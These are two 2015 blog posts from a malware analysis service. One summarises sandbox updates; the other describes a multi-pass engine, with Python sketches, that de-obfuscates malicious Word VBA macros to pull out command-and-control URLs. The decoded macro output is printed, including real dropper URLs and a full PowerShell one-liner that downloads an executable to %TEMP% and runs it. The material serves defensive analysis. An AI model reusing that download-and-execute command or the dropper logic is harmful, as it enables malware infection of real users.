Monday, March 23, 2015

Latest Updates of VxStream Sandbox and the Malware Analysis Service at Hybrid-Analysis.com

A previous blog post published at the beginning of February outlined some of the new features that were added to our online malware analysis service. We have added quite a lot of functionality since then, so here is a brief summary to keep our readers and users up to date.

 

Updated Anti-VM Technology

After Pafish v0.4 (a benchmarking tool that implements common VM detection methods) was released earlier this year, we brought our anti-VM technology up to date and ran a small benchmark of some popular malware analysis services at the same time. Today, Pafish v0.5 was released; we will start working on our anti-VM technology in the coming weeks and keep you updated on any progress.

 

Improved Searching Capabilities

We improved the webservice search and added some more advanced search options. In the previous version, you could search by filename, MD5 or SHA256 hash. Now you can also search by virus family name, or for all reports that contacted a specific host IP address or domain. Examples:
Please note: if the search returns only one result, you are automatically redirected to the report. Also, the vxfamily search is a substring search and applies only to the virus family name determined by VxStream. Each search returns at most 100 results.

Also, some of the new searching capabilities were integrated into all online reports with direct links, so you can continue navigating to other reports by clicking the virus family name or quickly find other reports with common network destinations (see the following image).

 

Updated VBA Macro Parsing

As we had been getting more and more uploads of Word files and malicious XML files (not all of which triggered or showed outgoing network traffic), we spent some time adding a small VBA "de-obfuscating" engine that helps extract C2 IPs regardless of the runtime behavior. We published a blog post about it last week that received good feedback, and the engine is showing good results so far. After we published the post, Philippe Lagadec announced that he is working on a generic engine that does the same and more, so we are looking forward to that development and will keep you updated on any progress.

 

Other updates not mentioned anywhere

Of course, we also make updates that are not published as part of blogposts or mentioned in the FAQ page of the service, because it would take too much time and not everything is really significant. Some of these updates over the past week included:
  • we added new YARA signatures that run on all input samples (we have ~600 online right now)
  • we have been adding more generic behavior signatures (we have ~215 online right now)
  • we added a webservice statistics page to clean up the front page, which tells you the current status of the number of signatures loaded by the system
  • we added support for MIME types (i.e. you can upload a MIME-encoded file and the service will "unmime" it and analyze the valid file embedded in it, if there is one)
  • we added "environment groups" (multiple systems) that can be selected from if you upload a file
  • we added some Windows 8.1 VMs
  • we added the ability to "not share" a sample when submitting (it is not available for download and not uploaded to VirusTotal, if unknown)
  • we added a download for strings detected in-memory
  • we added shellcode streams that are extracted from memory written to foreign processes
  • we brushed up the visuals a bit, especially the submissions list that contains a lot more information now
... and a few other minor things that do not need to be mentioned here.

Saturday, March 14, 2015

Analyzing obfuscated VBA macros to extract C2 IP/URLs regardless of runtime behavior

Introduction

Lately, we have been seeing quite a lot of Office documents (or XML files with embedded Office documents, etc.) with embedded VBA macros on our malware analysis service that try to drop Dridex or similar. Internally, we use olevba (thanks for this great tool to Philippe Lagadec, by the way!) to extract the VBA macro source code. Sometimes, though, the Word file does not "trigger" (it might include some VM detection code, have incompatible requirements, etc.), so in order to still extract something useful like a C2 IP/URL, we are left with static analysis techniques and an often heavily obfuscated macro source. Here's an example:
Function \xe2\xe0\xfb\xe2\xc0\xc0\xfb\xe2\xef\xfb\xe2\xe0(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean

\xcf\xd0\xfb\xe2\xe0\xc0 = 
\xce\xf0\xe2\xe0\xe0\xcc\xd0\xce\xeb\xe2\xef\xe2\xe0\xef(0&, 
z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)

Set \xe3\xed\xc3\xd8\xc0\xcf\xf8\xe2\xfb\xe0 = 
CreateObject(QSzFZhQCxywB(Chr$(83) & Chr$(132) & 
Chr$(104) & Chr$(55) & Chr$(101) & Chr$(87) 
& Chr$(108) & Chr$(89) & Chr$(108) & 
Chr$(131) & Chr$(46) & Chr$(133) & Chr$(65) 
& Chr$(52) & Chr$(112) & Chr$(97) & 
Chr$(112) & Chr$(61) & Chr$(108) & Chr$(117) 
& Chr$(105) & Chr$(47) & Chr$(99) & 
Chr$(110) & Chr$(97) & Chr$(122) & Chr$(116) 
& Chr$(59) & Chr$(105) & Chr$(75) & 
Chr$(111) & Chr$(54) & Chr$(110) & Chr$(115)))
As we can see (even with VB syntax highlighting ;-) it is not very human friendly, and applying a regex to pull out a URL will not work either. In order to understand the VBA source better (and possibly apply some patterns), we would need to resolve e.g. the Chr$() calls and the ampersands, concatenate strings and so forth. As this is a pretty straightforward, "dumb" and time-consuming manual process, we had an idea: why not try to automate these kinds of tasks? After all, this is crying out for a computer program to process. So we developed a small "simplifier" engine/algorithm that makes multiple passes through the various VBA functions to resolve and concatenate strings (and a little bit more). Additionally, we implemented some semi-intelligent brute-force mechanisms to extract URLs from the "simplified source code", as some of them are often padded with trash bytes or hidden by other simple algorithms.
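The multi-pass idea can be illustrated with a minimal Python sketch. This is not the VxStream engine, only an approximation under simple assumptions: `Chr`/`Chr$`/`ChrW` and `Asc` are called with literal arguments, and strings are joined with `&` or `+`. The names `simplify`, `CHR_CALL`, `ASC_CALL` and `CONCAT` are hypothetical and chosen for this example only.

```python
import re

# Chr(83), Chr$(83) or ChrW(83) with a decimal literal argument.
CHR_CALL = re.compile(r'\bChrW?\$?\(\s*(\d+)\s*\)', re.IGNORECASE)
# Asc("e") with a single-character string literal argument.
ASC_CALL = re.compile(r'\bAsc\(\s*"([^"])"\s*\)', re.IGNORECASE)
# Two adjacent string literals joined by & or + ("" is an escaped quote).
CONCAT = re.compile(r'"((?:[^"]|"")*)"\s*[&+]\s*"((?:[^"]|"")*)"')


def _chr_to_literal(match):
    """Turn Chr(n) into a VBA string literal; skip values this sketch ignores."""
    code = int(match.group(1))
    if not 32 <= code <= 255:
        return match.group(0)
    return '"' + chr(code).replace('"', '""') + '"'


def simplify(line):
    """Repeat the rewrite passes until the line no longer changes."""
    previous = None
    while previous != line:
        previous = line
        line = ASC_CALL.sub(lambda m: str(ord(m.group(1))), line)
        line = CHR_CALL.sub(_chr_to_literal, line)
        line = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', line)
    return line


if __name__ == "__main__":
    print(simplify('Chr$(83) & Chr$(104) & Chr$(101)'))  # prints "She"
```

Several passes are needed because each pass only folds what is already a literal: `Chr(Asc("e"))` first becomes `Chr(101)`, then `"e"`, and only then can it be concatenated with its neighbours. A regex-based approach like this one will mis-handle some inputs (for example literals that themselves look like operators), so a real implementation would more likely work on a tokenized or parsed form of the source.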

Here is a "before/after" example to make this "simplification" a bit easier to understand.

Before

URLLSK = "www.asivamosensalud.org/images/log"

STAA = "savepic.su/5238122"

STAB = "savepic.su/5233002"

...

Print #Kasdwq, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\W" + "indows\T" + "emp" + "\" + VBTXP + Chr(34)

Print #Kasdwq, "pin" + "g 2.2.1.1 -n" & " 2" + ""

Print #Kasdwq, "" + "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc("e")) + Chr(Asc("x")) + Chr(Asc("e"))

...

Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + URLLSK + "." + Chr(Asc("j")) + Chr(Asc("p")) + "g" + Chr(34)

Print #FileNumber, "statRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + STAA + "." + Chr(Asc("p")) + Chr(Asc("n")) + "g" + Chr(34)
    

After

Print #Kasdwq, "cscript.exe "c:\Windows\Temp\adobeacd-updatexp.vbs""

Print #Kasdwq, "ping 2.2.1.1 -n 2"

Print #Kasdwq, "c:\Windows\Temp\444.exe"

...

Print #FileNumber, "strRT = "http://www.asivamosensalud.org/images/log.jpg""

Print #FileNumber, "statRT = "http://savepic.su/5238122.png""

While the above example is a rather simple one, it still shows the basic principle and even includes a kind of "constant propagation" for variables (see "URLLSK" and "STAA" in the "Before" code).
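The constant propagation step could look roughly like the following Python sketch. It assumes that each variable is assigned a plain string literal on its own line before it is used, and it ignores control flow entirely; the function names are hypothetical and not taken from VxStream.

```python
import re

# A line of the form: NAME = "literal"
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*"([^"]*)"\s*$')
# A VBA string literal ("" inside a literal is an escaped quote).
LITERAL = re.compile(r'("(?:[^"]|"")*")')
IDENT = re.compile(r'\b[A-Za-z_]\w*\b')


def _substitute(line, constants):
    """Replace known variable names, but only outside string literals."""
    parts = LITERAL.split(line)  # odd indices hold the literals themselves

    def repl(match):
        name = match.group(0)
        return '"%s"' % constants[name] if name in constants else name

    for i in range(0, len(parts), 2):
        parts[i] = IDENT.sub(repl, parts[i])
    return ''.join(parts)


def propagate_constants(lines):
    """Record simple string assignments and inline them into later lines."""
    constants = {}
    result = []
    for line in lines:
        match = ASSIGN.match(line)
        if match:
            constants[match.group(1)] = match.group(2)
            result.append(line)
        else:
            result.append(_substitute(line, constants))
    return result


if __name__ == "__main__":
    source = [
        'URLLSK = "www.asivamosensalud.org/images/log"',
        'Print #FileNumber, "http://" + URLLSK + ".jpg"',
    ]
    for out in propagate_constants(source):
        print(out)
```

After this substitution the line consists only of string literals and operators, so a concatenation pass can fold it into a single string containing the full URL.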

 

In Practice

Of course, we have been testing our new simplification algorithm and ran it against a few malicious Word documents, especially those that do not "trigger" (i.e. do not successfully start downloading files). The "non-triggering" samples are the most interesting, as those that execute successfully reveal the alleged C2 URLs and IPs anyway. Below are a few real-world examples, together with the corresponding malwr reports, to underline that neither system triggered and/or showed any network traffic.

 

Example 1

SHA256: 475aa057202c98a0eab161e1d073390b34312565f98efb6c527c01791805523b
Link: Hybrid-Analysis Report
Link: Malwr Report
VirusTotal: 2/57 (Sophos, TrendMicro) on 13/03/15, 19/57 on 14/03/15
Decoded URL: hxxp://95.163.121.186/api/gbb1.exe

 

Example 2

SHA256: 9683b0eed6bdb1f16607a9cac5c72af2a69839bb591d5f8bfd3efc3963b292c0
Link: Hybrid-Analysis Report
Link: Malwr Report
VirusTotal: 1/57 (Ikarus) on 13/03/15, 23/57 on 14/03/15
Decoded URL: hxxp://accalamh.aspone.cz/js/bin.exe

 

Example 3

SHA256: 8e6bb148ffc0e18c0450a89f7b0ba729a28eb22da12fd3f69d18daa85fd09024
Link: Hybrid-Analysis Report
Link: Malwr Report
VirusTotal: 1/57 (CAT-QuickHeal) on 16/02/15, 35/57 on 14/03/15
Decoded URL: hxxp://91.220.131.28/upd2/install.exe

If you look at the Hybrid-Analysis reports generated with the new VBA processing capabilities, you will see the extracted C2 URLs/IPs as a "Found URL in decoded VBA string" signature in the malicious section at the top of the report. This is how it looks:


Of course, the presented simplification will not always yield the desired result, especially when malware authors adapt and introduce more complicated obfuscation techniques. As always, it is a bit of a cat and mouse game. Thus, we will be observing samples being submitted and try to adapt, if we can and if it's necessary. The current version works, but it is at the same time also a "proof of concept" to underline that there's a lot of room for improvement.
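To give an idea of what a brute-force URL extraction over padded strings might look like, here is a small Python sketch. It assumes one specific padding scheme (a trash character inserted at a fixed interval) and simply tries a few strides and offsets; the actual mechanisms in VxStream are not described here and may differ. The host `example.test` is a made-up placeholder.

```python
import re

# Deliberately simple URL pattern; good enough for an illustration.
URL = re.compile(r'https?://[A-Za-z0-9.-]+(?:/[^\s"\']*)?')


def brute_force_urls(text, max_stride=4):
    """Look for URLs in every 'take each n-th character' view of the text."""
    found = set()
    for stride in range(1, max_stride + 1):
        for offset in range(stride):
            candidate = text[offset::stride]
            found.update(URL.findall(candidate))
    return sorted(found)


if __name__ == "__main__":
    # Hypothetical sample: every second character is padding.
    padded = ''.join(ch + 'x' for ch in 'http://example.test/a.exe')
    print(brute_force_urls(padded))
```

With a stride of 1 the function behaves like a plain regex search, so unpadded URLs are still found; larger strides cover strings where real characters alternate with filler.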

Conclusion

In our opinion, we can draw at least the following conclusions:
  • static analysis in the context of malware analysis can be very important, if we are a little bit more intelligent about it
  • from the small AV benchmark (see VirusTotal results above), we can say that about 1/3 of AV vendors seem to react quite quickly to new threats, within 24 hours and/or day(s), while about 2/3 of AV vendors seem to react within the first couple of weeks; a lot of vendors seem to have issues if it's a zero-day Word document, although it would be possible to detect malicious characteristics using pure static analysis
///

Update: small "add-on" to the decoding technique presented above. We have been getting some samples that try to hide URLs and other interesting strings using a simple hex-encoded ASCII string. Here is a good example:

https://www.hybrid-analysis.com/sample/83758075cd5d2538d77cb5b723fab1656455f0639f59d59898b23fb593bf3871

If we scroll down to the "Contains embedded VBA macros" signature and expand it, we can see the following VBA code:


The decoded string is actually:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('hxxp://193.26.217.197/instana/vsacz.exe','%TEMP%\BKHkjgkKKJdf.cab'); expand %TEMP%\BKHkjgkKKJdf.cab %TEMP%\BKHkjgkKKJdf.exe; start %TEMP%\BKHkjgkKKJdf.exe;

Ouch! ;-)

We updated our algorithm to now also decode these kinds of strings and forward them to the behavior signature interface (thereby triggering string-related signatures and detecting the URL).
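Decoding hex-encoded ASCII strings of this kind can be sketched in a few lines of Python. The minimum length of 8 bytes and the 90% printable threshold are arbitrary assumptions for this example, as is the function name; they are not the values used by VxStream.

```python
import re

# A run of at least 8 hex-encoded bytes (16 hex digits), even length only.
HEX_RUN = re.compile(r'\b(?:[0-9A-Fa-f]{2}){8,}\b')


def decode_hex_strings(source, min_printable=0.9):
    """Return decoded text for hex runs that are mostly printable ASCII."""
    results = []
    for match in HEX_RUN.finditer(source):
        raw = bytes.fromhex(match.group(0))
        printable = sum(32 <= byte < 127 for byte in raw)
        if printable / len(raw) >= min_printable:
            results.append(raw.decode('ascii', errors='replace'))
    return results


if __name__ == "__main__":
    encoded = 'cmd /K powershell.exe'.encode('ascii').hex()
    print(decode_hex_strings('s = "' + encoded + '"'))
```

The printable-ratio check is there to avoid reporting hashes or binary blobs that happen to consist of hex digits. The decoded strings can then be handed to the same URL and string signatures as any other string found in the macro.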

///

Contact us or learn more about VxStream Sandbox - Automated Malware Analysis.